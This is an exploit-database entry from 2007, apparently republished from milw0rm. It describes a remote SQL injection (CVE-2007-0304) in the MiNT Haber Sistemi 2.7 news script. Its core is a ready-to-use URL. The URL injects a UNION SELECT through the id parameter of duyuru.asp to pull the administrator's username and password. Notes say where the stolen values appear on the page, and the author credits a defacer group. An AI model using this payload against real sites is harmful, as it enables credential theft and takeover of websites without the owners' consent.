Mint Haber Sistemi 2.7 duyuru.asp id Remote SQL Injection Vulnerability

2007-01-12T00:00:00
ID EDB-ID:3120
Type exploitdb
Reporter chernobiLe
Modified 2007-01-12T00:00:00

Description

Mint Haber Sistemi 2.7 (duyuru.asp id) Remote SQL Injection Vulnerability. CVE-2007-0304. Webapps exploit for php platform

                                        
                                            ###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-12]